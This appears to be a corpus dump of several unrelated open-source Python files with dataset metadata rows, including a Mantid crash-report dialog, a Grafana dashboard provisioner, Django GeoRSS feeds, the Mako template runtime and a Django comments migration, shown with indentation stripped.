_plugin_loaded = False
def load_plugins(config):
global _plugin_loaded
if _plugin_loaded:
return
_plugin_loaded = True
if not config.has_option('Plugin', 'plugin_directory'):
return
directory = config.get('Plugin', 'plugin_directory')
for file in glob.glob(os.path.join(directory, '*.py')):
_import_module(file)
| gpl-3.0 | -8,806,418,516,966,083,000 | 28.944444 | 79 | 0.693878 | false |
rosswhitfield/mantid | qt/python/mantidqt/dialogs/errorreports/report.py | 3 | 5965 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from qtpy import QtCore, QtGui, QtWidgets
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QMessageBox
from mantidqt.interfacemanager import InterfaceManager
from mantidqt.utils.qt import load_ui
from .details import MoreDetailsDialog
DEFAULT_PLAIN_TEXT = (
"""Please enter any additional information about your problems. (Max 3200 characters)
For example:
Error messages on the screen
A script that causes the problem
The functions you used immediately before the problem
Thank you!""")
ErrorReportUIBase, ErrorReportUI = load_ui(__file__, 'errorreport.ui')
class CrashReportPage(ErrorReportUIBase, ErrorReportUI):
action = Signal(bool, int, str, str, str)
quit_signal = Signal()
free_text_edited = False
interface_manager = InterfaceManager()
def __init__(self, parent=None, show_continue_terminate=False):
super(self.__class__, self).__init__(parent)
self.setupUi(self)
if hasattr(self.input_free_text, 'setPlaceholderText'):
self.input_free_text.setPlaceholderText(DEFAULT_PLAIN_TEXT)
else:
# assume Qt<5
self.input_free_text.setPlainText(DEFAULT_PLAIN_TEXT)
self.input_free_text.cursorPositionChanged.connect(self.check_placeholder_text)
self.input_text = ""
if not show_continue_terminate:
self.continue_terminate_frame.hide()
self.adjustSize()
self.quit_signal.connect(QtWidgets.QApplication.instance().quit)
self.icon.setPixmap(QtGui.QPixmap(":/images/crying_mantid.png"))
self.requestTextBrowser.anchorClicked.connect(self.interface_manager.showWebPage)
self.input_name_line_edit.textChanged.connect(self.set_button_status)
self.input_email_line_edit.textChanged.connect(self.set_button_status)
self.input_free_text.textChanged.connect(self.set_button_status)
self.input_free_text.textChanged.connect(self.set_plain_text_edit_field)
self.privacy_policy_label.linkActivated.connect(self.launch_privacy_policy)
# The options on what to do after closing the window (exit/continue)
self.radioButtonContinue.setChecked(True) # Set continue to be checked by default
# These are the options along the bottom
self.fullShareButton.clicked.connect(self.fullShare)
self.nonIDShareButton.clicked.connect(self.nonIDShare)
self.noShareButton.clicked.connect(self.noShare)
self.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint
| QtCore.Qt.WindowStaysOnTopHint)
self.setWindowModality(QtCore.Qt.ApplicationModal)
# Dialog window to show more details of the crash to the user.
self.details_dialog = MoreDetailsDialog(self)
def quit(self):
self.quit_signal.emit()
def fullShare(self):
self.action.emit(self.continue_working, 0, self.input_name, self.input_email,
self.input_text)
self.close()
def nonIDShare(self):
self.action.emit(self.continue_working, 1, self.input_name, self.input_email,
self.input_text)
self.close()
def noShare(self):
self.action.emit(self.continue_working, 2, self.input_name, self.input_email,
self.input_text)
self.close()
def get_simple_line_edit_field(self, expected_type, line_edit):
gui_element = getattr(self, line_edit)
value_as_string = gui_element.text()
return expected_type(value_as_string) if value_as_string else ''
def set_plain_text_edit_field(self):
self.input_text = self.get_plain_text_edit_field(text_edit="input_free_text",
expected_type=str)
def get_plain_text_edit_field(self, text_edit, expected_type):
gui_element = getattr(self, text_edit)
value_as_string = gui_element.toPlainText()
return expected_type(value_as_string) if value_as_string else ''
def check_placeholder_text(self):
if not self.free_text_edited:
self.free_text_edited = True
self.input_free_text.setPlainText("")
def launch_privacy_policy(self, link):
self.interface_manager.showWebPage(link)
def set_button_status(self):
if self.input_text == '' and not self.input_name and not self.input_email:
self.nonIDShareButton.setEnabled(True)
else:
self.nonIDShareButton.setEnabled(False)
def display_message_box(self, title, message, details):
msg = QMessageBox(self)
msg.setIcon(QMessageBox.Warning)
msg.setText(message)
msg.setWindowTitle(title)
msg.setDetailedText(details)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.setEscapeButton(QMessageBox.Ok)
msg.exec_()
def display_more_details(self, user_information_text, stacktrace_text):
self.details_dialog.set_stacktrace_text(stacktrace_text)
self.details_dialog.set_user_text(user_information_text)
self.details_dialog.show()
def set_report_callback(self, callback):
self.action.connect(callback)
@property
def input_name(self):
return self.get_simple_line_edit_field(line_edit="input_name_line_edit", expected_type=str)
@property
def input_email(self):
return self.get_simple_line_edit_field(line_edit="input_email_line_edit", expected_type=str)
@property
def continue_working(self):
return self.radioButtonContinue.isChecked()
| gpl-3.0 | -938,921,812,033,839,000 | 37.483871 | 100 | 0.676614 | false |
zerotired/kotori | kotori/vendor/luftdaten/application.py | 2 | 4013 | # -*- coding: utf-8 -*-
# (c) 2017 Andreas Motl <[email protected]>
import json
from pkg_resources import resource_filename
from jinja2 import Template
from twisted.logger import Logger
from grafana_api_client import GrafanaPreconditionFailedError, GrafanaClientError
from kotori.daq.services.mig import MqttInfluxGrafanaService
from kotori.daq.graphing.grafana.manager import GrafanaManager
from kotori.daq.storage.influx import InfluxDBAdapter
log = Logger()
class LuftdatenGrafanaManager(GrafanaManager):
def __init__(self, *args, **kwargs):
GrafanaManager.__init__(self, *args, **kwargs)
self.tpl_dashboard_map = self.get_template('grafana-map.json')
self.tpl_dashboard_location = self.get_template('grafana-by-location.json')
def get_template(self, filename):
return Template(file(resource_filename('kotori.vendor.luftdaten', filename)).read().decode('utf-8'))
def provision(self, storage_location, message, topology):
topology = topology or {}
dashboard_name = self.strategy.topology_to_label(topology)
# The identity information of this provisioning process
signature = (storage_location.database, storage_location.measurement)
whoami = 'dashboard "{dashboard_name}" for database "{database}" and measurement "{measurement}"'.format(
dashboard_name=dashboard_name, database=storage_location.database, measurement=storage_location.measurement)
# Skip dashboard creation if it already has been created while Kotori is running
# TODO: Improve locking to prevent race conditions.
if self.keycache.exists(*signature):
log.debug('Data signature not changed, skip update of {whoami}', whoami=whoami)
return
log.info('Provisioning Grafana {whoami}', whoami=whoami)
# Create a Grafana datasource object for designated database
self.create_datasource(storage_location)
# Create appropriate Grafana dashboard
data_dashboard = {
'database': storage_location.database,
'measurement': storage_location.measurement,
'measurement_events': storage_location.measurement_events,
}
dashboard_json_map = self.tpl_dashboard_map.render(data_dashboard, title='{name} map'.format(name=dashboard_name))
dashboard_json_location = self.tpl_dashboard_location.render(data_dashboard, title='{name} by-location'.format(name=dashboard_name))
# Get or create Grafana folder for stuffing all instant dashboards into
folder = self.grafana_api.ensure_instant_folder()
folder_id = folder and folder.get('id') or None
for dashboard_json in [dashboard_json_map, dashboard_json_location]:
try:
log.info('Creating/updating dashboard "{}"'.format(dashboard_name))
response = self.grafana_api.grafana_client.dashboards.db.create(
folderId=folder_id, dashboard=json.loads(dashboard_json), overwrite=True)
log.info(u'Grafana response: {response}', response=json.dumps(response))
except GrafanaPreconditionFailedError as ex:
if 'name-exists' in ex.message or 'A dashboard with the same name already exists' in ex.message:
log.warn(ex.message)
else:
log.error('Grafana Error: {ex}', ex=ex.message)
except GrafanaClientError as ex:
log.error('Grafana Error: {ex}', ex=ex.message)
# Remember dashboard/panel creation for this kind of data inflow
self.keycache.set(storage_location.database, storage_location.measurement)
class LuftdatenMqttInfluxGrafanaService(MqttInfluxGrafanaService):
def setupService(self):
MqttInfluxGrafanaService.setupService(self)
self.settings.influxdb.use_udp = True
self.settings.influxdb.udp_port = 4445
self.influx = InfluxDBAdapter(settings = self.settings.influxdb)
| agpl-3.0 | 8,249,197,943,016,283,000 | 44.602273 | 140 | 0.688014 | false |
leopittelli/Django-on-App-Engine-Example | django/contrib/gis/feeds.py | 225 | 5932 | from __future__ import unicode_literals
from django.contrib.syndication.views import Feed as BaseFeed
from django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed
class GeoFeedMixin(object):
"""
This mixin provides the necessary routines for SyndicationFeed subclasses
to produce simple GeoRSS or W3C Geo elements.
"""
def georss_coords(self, coords):
"""
In GeoRSS coordinate pairs are ordered by lat/lon and separated by
a single white space. Given a tuple of coordinates, this will return
a unicode GeoRSS representation.
"""
return ' '.join(['%f %f' % (coord[1], coord[0]) for coord in coords])
def add_georss_point(self, handler, coords, w3c_geo=False):
"""
Adds a GeoRSS point with the given coords using the given handler.
Handles the differences between simple GeoRSS and the more pouplar
W3C Geo specification.
"""
if w3c_geo:
lon, lat = coords[:2]
handler.addQuickElement('geo:lat', '%f' % lat)
handler.addQuickElement('geo:lon', '%f' % lon)
else:
handler.addQuickElement('georss:point', self.georss_coords((coords,)))
def add_georss_element(self, handler, item, w3c_geo=False):
"""
This routine adds a GeoRSS XML element using the given item and handler.
"""
# Getting the Geometry object.
geom = item.get('geometry', None)
if not geom is None:
if isinstance(geom, (list, tuple)):
# Special case if a tuple/list was passed in. The tuple may be
# a point or a box
box_coords = None
if isinstance(geom[0], (list, tuple)):
# Box: ( (X0, Y0), (X1, Y1) )
if len(geom) == 2:
box_coords = geom
else:
raise ValueError('Only should be two sets of coordinates.')
else:
if len(geom) == 2:
# Point: (X, Y)
self.add_georss_point(handler, geom, w3c_geo=w3c_geo)
elif len(geom) == 4:
# Box: (X0, Y0, X1, Y1)
box_coords = (geom[:2], geom[2:])
else:
raise ValueError('Only should be 2 or 4 numeric elements.')
# If a GeoRSS box was given via tuple.
if not box_coords is None:
if w3c_geo: raise ValueError('Cannot use simple GeoRSS box in W3C Geo feeds.')
handler.addQuickElement('georss:box', self.georss_coords(box_coords))
else:
# Getting the lower-case geometry type.
gtype = str(geom.geom_type).lower()
if gtype == 'point':
self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)
else:
if w3c_geo: raise ValueError('W3C Geo only supports Point geometries.')
# For formatting consistent w/the GeoRSS simple standard:
# http://georss.org/1.0#simple
if gtype in ('linestring', 'linearring'):
handler.addQuickElement('georss:line', self.georss_coords(geom.coords))
elif gtype in ('polygon',):
# Only support the exterior ring.
handler.addQuickElement('georss:polygon', self.georss_coords(geom[0].coords))
else:
raise ValueError('Geometry type "%s" not supported.' % geom.geom_type)
### SyndicationFeed subclasses ###
class GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super(GeoRSSFeed, self).rss_attributes()
attrs['xmlns:georss'] = 'http://www.georss.org/georss'
return attrs
def add_item_elements(self, handler, item):
super(GeoRSSFeed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super(GeoRSSFeed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class GeoAtom1Feed(Atom1Feed, GeoFeedMixin):
def root_attributes(self):
attrs = super(GeoAtom1Feed, self).root_attributes()
attrs['xmlns:georss'] = 'http://www.georss.org/georss'
return attrs
def add_item_elements(self, handler, item):
super(GeoAtom1Feed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super(GeoAtom1Feed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super(W3CGeoFeed, self).rss_attributes()
attrs['xmlns:geo'] = 'http://www.w3.org/2003/01/geo/wgs84_pos#'
return attrs
def add_item_elements(self, handler, item):
super(W3CGeoFeed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item, w3c_geo=True)
def add_root_elements(self, handler):
super(W3CGeoFeed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed, w3c_geo=True)
### Feed subclass ###
class Feed(BaseFeed):
"""
This is a subclass of the `Feed` from `django.contrib.syndication`.
This allows users to define a `geometry(obj)` and/or `item_geometry(item)`
methods on their own subclasses so that geo-referenced information may
placed in the feed.
"""
feed_type = GeoRSSFeed
def feed_extra_kwargs(self, obj):
return {'geometry' : self.__get_dynamic_attr('geometry', obj)}
def item_extra_kwargs(self, item):
return {'geometry' : self.__get_dynamic_attr('item_geometry', item)}
| mit | 469,958,736,604,622,460 | 42.29927 | 101 | 0.587492 | false |
jokajak/itweb | data/env/lib/python2.6/site-packages/Mako-0.3.4-py2.6.egg/mako/runtime.py | 21 | 17576 | # runtime.py
# Copyright (C) 2006, 2007, 2008, 2009, 2010 Michael Bayer [email protected]
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides runtime services for templates, including Context, Namespace, and various helper functions."""
from mako import exceptions, util
import __builtin__, inspect, sys
class Context(object):
"""provides runtime namespace, output buffer, and various callstacks for templates."""
def __init__(self, buffer, **data):
self._buffer_stack = [buffer]
self._orig = data # original data, minus the builtins
self._data = __builtin__.__dict__.copy() # the context data which includes builtins
self._data.update(data)
self._kwargs = data.copy()
self._with_template = None
self._outputting_as_unicode = None
self.namespaces = {}
# "capture" function which proxies to the generic "capture" function
self._data['capture'] = lambda x, *args, **kwargs: capture(self, x, *args, **kwargs)
# "caller" stack used by def calls with content
self.caller_stack = self._data['caller'] = CallerStack()
@property
def lookup(self):
return self._with_template.lookup
@property
def kwargs(self):
return self._kwargs.copy()
def push_caller(self, caller):
self.caller_stack.append(caller)
def pop_caller(self):
del self.caller_stack[-1]
def keys(self):
return self._data.keys()
def __getitem__(self, key):
return self._data[key]
def _push_writer(self):
"""push a capturing buffer onto this Context and return the new Writer function."""
buf = util.FastEncodingBuffer()
self._buffer_stack.append(buf)
return buf.write
def _pop_buffer_and_writer(self):
"""pop the most recent capturing buffer from this Context
and return the current writer after the pop.
"""
buf = self._buffer_stack.pop()
return buf, self._buffer_stack[-1].write
def _push_buffer(self):
"""push a capturing buffer onto this Context."""
self._push_writer()
def _pop_buffer(self):
"""pop the most recent capturing buffer from this Context."""
return self._buffer_stack.pop()
def get(self, key, default=None):
return self._data.get(key, default)
def write(self, string):
"""write a string to this Context's underlying output buffer."""
self._buffer_stack[-1].write(string)
def writer(self):
"""return the current writer function"""
return self._buffer_stack[-1].write
def _copy(self):
c = Context.__new__(Context)
c._buffer_stack = self._buffer_stack
c._data = self._data.copy()
c._orig = self._orig
c._kwargs = self._kwargs
c._with_template = self._with_template
c._outputting_as_unicode = self._outputting_as_unicode
c.namespaces = self.namespaces
c.caller_stack = self.caller_stack
return c
def locals_(self, d):
"""create a new Context with a copy of this Context's current state, updated with the given dictionary."""
if len(d) == 0:
return self
c = self._copy()
c._data.update(d)
return c
def _clean_inheritance_tokens(self):
"""create a new copy of this Context with tokens related to inheritance state removed."""
c = self._copy()
x = c._data
x.pop('self', None)
x.pop('parent', None)
x.pop('next', None)
return c
class CallerStack(list):
def __init__(self):
self.nextcaller = None
def __nonzero__(self):
return self._get_caller() and True or False
def _get_caller(self):
return self[-1]
def __getattr__(self, key):
return getattr(self._get_caller(), key)
def _push_frame(self):
self.append(self.nextcaller or None)
self.nextcaller = None
def _pop_frame(self):
self.nextcaller = self.pop()
class Undefined(object):
"""represents an undefined value in a template."""
def __str__(self):
raise NameError("Undefined")
def __nonzero__(self):
return False
UNDEFINED = Undefined()
class _NSAttr(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
ns = self.__parent
while ns:
if hasattr(ns.module, key):
return getattr(ns.module, key)
else:
ns = ns.inherits
raise AttributeError(key)
class Namespace(object):
"""provides access to collections of rendering methods, which
can be local, from other templates, or from imported modules"""
def __init__(self, name, context, module=None,
template=None, templateuri=None,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
if module is not None:
mod = __import__(module)
for token in module.split('.')[1:]:
mod = getattr(mod, token)
self._module = mod
else:
self._module = None
if templateuri is not None:
self.template = _lookup_template(context, templateuri, calling_uri)
self._templateuri = self.template.module._template_uri
else:
self.template = template
if self.template is not None:
self._templateuri = self.template.module._template_uri
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.func_name, c) for c in callables])
else:
self.callables = None
if populate_self and self.template is not None:
(lclcallable, lclcontext) = _populate_self_namespace(context, self.template, self_ns=self)
@property
def module(self):
return self._module or self.template.module
@property
def filename(self):
if self._module:
return self._module.__file__
else:
return self.template.filename
@property
def uri(self):
return self.template.uri
@property
def attr(self):
if not hasattr(self, '_attr'):
self._attr = _NSAttr(self)
return self._attr
def get_namespace(self, uri):
"""return a namespace corresponding to the given template uri.
if a relative uri, it is adjusted to that of the template of this namespace"""
key = (self, uri)
if self.context.namespaces.has_key(key):
return self.context.namespaces[key]
else:
ns = Namespace(uri, self.context._copy(), templateuri=uri, calling_uri=self._templateuri)
self.context.namespaces[key] = ns
return ns
def get_template(self, uri):
return _lookup_template(self.context, uri, self._templateuri)
def get_cached(self, key, **kwargs):
if self.template:
if not self.template.cache_enabled:
createfunc = kwargs.get('createfunc', None)
if createfunc:
return createfunc()
else:
return None
if self.template.cache_dir:
kwargs.setdefault('data_dir', self.template.cache_dir)
if self.template.cache_type:
kwargs.setdefault('type', self.template.cache_type)
if self.template.cache_url:
kwargs.setdefault('url', self.template.cache_url)
return self.cache.get(key, **kwargs)
@property
def cache(self):
return self.template.cache
def include_file(self, uri, **kwargs):
"""include a file at the given uri"""
_include_file(self.context, uri, self._templateuri, **kwargs)
def _populate(self, d, l):
for ident in l:
if ident == '*':
for (k, v) in self._get_star():
d[k] = v
else:
d[ident] = getattr(self, ident)
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
if self.template:
def get(key):
callable_ = self.template._get_def_callable(key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
for k in self.template.module._exports:
yield (k, get(k))
if self._module:
def get(key):
callable_ = getattr(self._module, key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
for k in dir(self._module):
if k[0] != '_':
yield (k, get(k))
def __getattr__(self, key):
if self.callables and key in self.callables:
return self.callables[key]
if self.template and self.template.has_def(key):
callable_ = self.template._get_def_callable(key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
if self._module and hasattr(self._module, key):
callable_ = getattr(self._module, key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
if self.inherits is not None:
return getattr(self.inherits, key)
raise AttributeError("Namespace '%s' has no member '%s'" % (self.name, key))
def supports_caller(func):
"""apply a caller_stack compatibility decorator to a plain Python function."""
def wrap_stackframe(context, *args, **kwargs):
context.caller_stack._push_frame()
try:
return func(context, *args, **kwargs)
finally:
context.caller_stack._pop_frame()
return wrap_stackframe
def capture(context, callable_, *args, **kwargs):
"""execute the given template def, capturing the output into a buffer."""
if not callable(callable_):
raise exceptions.RuntimeException(
"capture() function expects a callable as "
"its argument (i.e. capture(func, *args, **kwargs))"
)
context._push_buffer()
try:
callable_(*args, **kwargs)
finally:
buf = context._pop_buffer()
return buf.getvalue()
def _decorate_toplevel(fn):
def decorate_render(render_fn):
def go(context, *args, **kw):
def y(*args, **kw):
return render_fn(context, *args, **kw)
try:
y.__name__ = render_fn.__name__[7:]
except TypeError:
# < Python 2.4
pass
return fn(y)(context, *args, **kw)
return go
return decorate_render
def _decorate_inline(context, fn):
def decorate_render(render_fn):
dec = fn(render_fn)
def go(*args, **kw):
return dec(context, *args, **kw)
return go
return decorate_render
def _include_file(context, uri, calling_uri, **kwargs):
"""locate the template from the given uri and include it in the current output."""
template = _lookup_template(context, uri, calling_uri)
(callable_, ctx) = _populate_self_namespace(context._clean_inheritance_tokens(), template)
callable_(ctx, **_kwargs_for_include(callable_, context._orig, **kwargs))
def _inherit_from(context, uri, calling_uri):
"""called by the _inherit method in template modules to set up the inheritance chain at the start
of a template's execution."""
if uri is None:
return None
template = _lookup_template(context, uri, calling_uri)
self_ns = context['self']
ih = self_ns
while ih.inherits is not None:
ih = ih.inherits
lclcontext = context.locals_({'next':ih})
ih.inherits = Namespace("self:%s" % template.uri, lclcontext, template = template, populate_self=False)
context._data['parent'] = lclcontext._data['local'] = ih.inherits
callable_ = getattr(template.module, '_mako_inherit', None)
if callable_ is not None:
ret = callable_(template, lclcontext)
if ret:
return ret
gen_ns = getattr(template.module, '_mako_generate_namespaces', None)
if gen_ns is not None:
gen_ns(context)
return (template.callable_, lclcontext)
def _lookup_template(context, uri, relativeto):
lookup = context._with_template.lookup
if lookup is None:
raise exceptions.TemplateLookupException("Template '%s' has no TemplateLookup associated" % context._with_template.uri)
uri = lookup.adjust_uri(uri, relativeto)
try:
return lookup.get_template(uri)
except exceptions.TopLevelLookupException, e:
raise exceptions.TemplateLookupException(str(e))
def _populate_self_namespace(context, template, self_ns=None):
if self_ns is None:
self_ns = Namespace('self:%s' % template.uri, context, template=template, populate_self=False)
context._data['self'] = context._data['local'] = self_ns
if hasattr(template.module, '_mako_inherit'):
ret = template.module._mako_inherit(template, context)
if ret:
return ret
return (template.callable_, context)
def _render(template, callable_, args, data, as_unicode=False):
"""create a Context and return the string output of the given template and template callable."""
if as_unicode:
buf = util.FastEncodingBuffer(unicode=True)
elif template.output_encoding:
buf = util.FastEncodingBuffer(
unicode=as_unicode,
encoding=template.output_encoding,
errors=template.encoding_errors)
else:
buf = util.StringIO()
context = Context(buf, **data)
context._outputting_as_unicode = as_unicode
context._with_template = template
_render_context(template, callable_, context, *args, **_kwargs_for_callable(callable_, data))
return context._pop_buffer().getvalue()
def _kwargs_for_callable(callable_, data):
argspec = inspect.getargspec(callable_)
# for normal pages, **pageargs is usually present
if argspec[2]:
return data
# for rendering defs from the top level, figure out the args
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
kwargs = {}
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _kwargs_for_include(callable_, data, **kwargs):
argspec = inspect.getargspec(callable_)
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _render_context(tmpl, callable_, context, *args, **kwargs):
import mako.template as template
# create polymorphic 'self' namespace for this template with possibly updated context
if not isinstance(tmpl, template.DefTemplate):
# if main render method, call from the base of the inheritance stack
(inherit, lclcontext) = _populate_self_namespace(context, tmpl)
_exec_template(inherit, lclcontext, args=args, kwargs=kwargs)
else:
# otherwise, call the actual rendering method specified
(inherit, lclcontext) = _populate_self_namespace(context, tmpl.parent)
_exec_template(callable_, context, args=args, kwargs=kwargs)
def _exec_template(callable_, context, args=None, kwargs=None):
"""execute a rendering callable given the callable, a Context, and optional explicit arguments
the contextual Template will be located if it exists, and the error handling options specified
on that Template will be interpreted here.
"""
template = context._with_template
if template is not None and (template.format_exceptions or template.error_handler):
error = None
try:
callable_(context, *args, **kwargs)
except Exception, e:
_render_error(template, context, e)
except:
e = sys.exc_info()[0]
_render_error(template, context, e)
else:
callable_(context, *args, **kwargs)
def _render_error(template, context, error):
if template.error_handler:
result = template.error_handler(context, error)
if not result:
raise error
else:
error_template = exceptions.html_error_template()
if context._outputting_as_unicode:
context._buffer_stack[:] = [util.FastEncodingBuffer(unicode=True)]
else:
context._buffer_stack[:] = [util.FastEncodingBuffer(
error_template.output_encoding,
error_template.encoding_errors)]
context._with_template = error_template
error_template.render_context(context, error=error)
| gpl-3.0 | -927,779,595,786,785,900 | 36.002105 | 127 | 0.587676 | false |
LagunaJS/Midori | django_comments/south_migrations/0001_initial.py | 11 | 7979 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Comment'
db.create_table('django_comments', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_comment', to=orm['contenttypes.ContentType'])),
('object_pk', self.gf('django.db.models.fields.TextField')()),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='comment_comments', null=True, to=orm[user_orm_label])),
('user_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
('user_email', self.gf('django.db.models.fields.EmailField')(max_length=75, blank=True)),
('user_url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('comment', self.gf('django.db.models.fields.TextField')(max_length=3000)),
('submit_date', self.gf('django.db.models.fields.DateTimeField')(default=None)),
('ip_address', self.gf('django.db.models.fields.GenericIPAddressField')(max_length=39, null=True, blank=True)),
('is_public', self.gf('django.db.models.fields.BooleanField')(default=True)),
('is_removed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'django_comments', ['Comment'])
# Adding model 'CommentFlag'
db.create_table('django_comment_flags', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='comment_flags', to=orm[user_orm_label])),
('comment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='flags', to=orm['django_comments.Comment'])),
('flag', self.gf('django.db.models.fields.CharField')(max_length=30, db_index=True)),
('flag_date', self.gf('django.db.models.fields.DateTimeField')(default=None)),
))
db.send_create_signal(u'django_comments', ['CommentFlag'])
# Adding unique constraint on 'CommentFlag', fields ['user', 'comment', 'flag']
db.create_unique('django_comment_flags', ['user_id', 'comment_id', 'flag'])
def backwards(self, orm):
# Removing unique constraint on 'CommentFlag', fields ['user', 'comment', 'flag']
db.delete_unique('django_comment_flags', ['user_id', 'comment_id', 'flag'])
# Deleting model 'Comment'
db.delete_table('django_comments')
# Deleting model 'CommentFlag'
db.delete_table('django_comment_flags')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
user_model_label: {
'Meta': {'object_name': User.__name__, 'db_table': "'{}'".format(User._meta.db_table)},
User._meta.pk.attname: ('django.db.models.fields.AutoField', [], {'primary_key': 'True', 'db_column': "'{}'".format(User._meta.pk.column)}),
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'django_comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': u"orm['{}']".format(user_orm_label)}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'django_comments.commentflag': {
'Meta': {'unique_together': "[('user', 'comment', 'flag')]", 'object_name': 'CommentFlag', 'db_table': "'django_comment_flags'"},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'flags'", 'to': u"orm['django_comments.Comment']"}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}),
'flag_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'comment_flags'", 'to': u"orm['{}']".format(user_orm_label)})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['django_comments']
| mit | -642,275,514,966,809,700 | 67.196581 | 187 | 0.584785 | false |
40223250/2015cd_midterm- | static/Brython3.1.1-20150328-091302/Lib/types.py | 756 | 3167 | """
